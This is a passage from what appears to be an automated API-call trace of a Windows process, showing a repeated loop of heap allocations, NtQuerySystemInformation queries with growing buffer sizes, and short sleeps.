SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.864] Sleep (dwMilliseconds=0x110) [0227.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.880] Sleep (dwMilliseconds=0x110) [0227.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.895] Sleep (dwMilliseconds=0x110) [0227.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.910] Sleep (dwMilliseconds=0x110) [0227.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.933] Sleep (dwMilliseconds=0x110) [0227.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.956] Sleep (dwMilliseconds=0x110) [0227.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.973] Sleep (dwMilliseconds=0x110) [0227.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0227.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0227.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0227.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0227.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0227.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0227.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0227.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0227.990] Sleep (dwMilliseconds=0x110) [0228.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.017] Sleep (dwMilliseconds=0x110) [0228.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.033] Sleep (dwMilliseconds=0x110) [0228.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.051] Sleep (dwMilliseconds=0x110) [0228.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.064] Sleep (dwMilliseconds=0x110) [0228.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.081] Sleep (dwMilliseconds=0x110) [0228.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0228.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0228.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0228.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0228.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0228.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0228.096] Sleep (dwMilliseconds=0x110) [0228.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0228.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0228.107] HeapFree (in: 